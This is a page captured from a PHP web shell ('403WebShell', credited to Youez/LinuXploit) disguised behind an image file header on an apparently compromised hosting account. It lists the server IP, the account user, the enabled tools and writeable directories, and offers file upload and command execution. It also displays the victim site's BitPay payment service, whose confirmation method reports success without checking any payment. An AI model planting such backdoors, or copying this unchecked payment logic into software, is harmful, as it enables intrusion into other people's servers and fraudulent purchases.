����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 13.58.164.55
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/bofirmacademy.com/app/Http/Services/Payment/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/bofirmacademy.com/app/Http/Services/Payment/BitPayService.php
<?php

namespace App\Http\Services\Payment;

use App\Models\Order;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Log;
use Vrajroham\LaravelBitpay\LaravelBitpay;

class BitPayService extends BasePaymentService
{
    public $apiKey;
    public $apiSecret;
    public $locale;
    public $IOptions;
    public $successUrl;
    public $cancelUrl;
    public $currency;
    public $username;
    public $memo;

    public function __construct($object)
    {
        if (isset($object['id'])) {
           $this->cancelUrl = isset($object['cancelUrl ']) ? $object['cancelUrl '] : route('paymentCancel', $object['id']);
            $this->successUrl = isset($object['successUrl']) ? $object['successUrl'] : route('paymentNotify', $object['id']);
        }

        config(['laravel-bitpay.network' => get_option('bitpay_mode', 'testnet')]);
        config(['laravel-bitpay.merchant_token' => get_option('bitpay_key', 'null')]);

        $this->currency = $object['currency'];
    }

    public function makePayment($amount, $order_id= NULL)
    {
        $data['success'] = false;
        $data['redirect_url'] = '';
        $data['payment_id'] = '';
        $data['message'] = '';
        try {
            $user = auth()->user();
            $price = $amount;

            $invoice = LaravelBitpay::Invoice();

            $invoice->setItemDesc(get_option('app_name' , 'LMSZAI'));
            $invoice->setItemCode('1234');
            $invoice->setPrice($price);
            $invoice->setOrderId('1234');

            // Create Buyer Instance
            $buyer = LaravelBitpay::Buyer();
            $buyer->setName($user->name);
            $buyer->setEmail($user->email ?? 'email@email.com');
            $buyer->setAddress1('no Address');
            $buyer->setNotify(true);

            $invoice->setBuyer($buyer);

            // Set currency
            $invoice->setCurrency($this->currency);

            $invoice->setRedirectURL($this->successUrl);

            // Create invoice on bitpay server.
            $invoice = LaravelBitpay::createInvoice($invoice);

            $data['redirect_url'] = $invoice->getUrl();
            $data['payment_id'] = $invoice->getId();
            $data['message'] = 'Successfully Initiate';
            $data['success'] = true;
            Log::info(json_encode($data));
            return  $data;
        } catch (\Exception $ex) {
            $data['message'] = $ex->getMessage();
            return $data;
        }
    }

    public function paymentConfirmation($payment_id, $token = null)
    {
        $data['data'] = null;

        $data['success'] = true;
        $data['data']['amount'] = 0;
        $data['data']['currency'] = $this->currency;
        $data['data']['payment_status'] =  'success';
        $data['data']['payment_method'] = BITPAY;
        return $data;
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit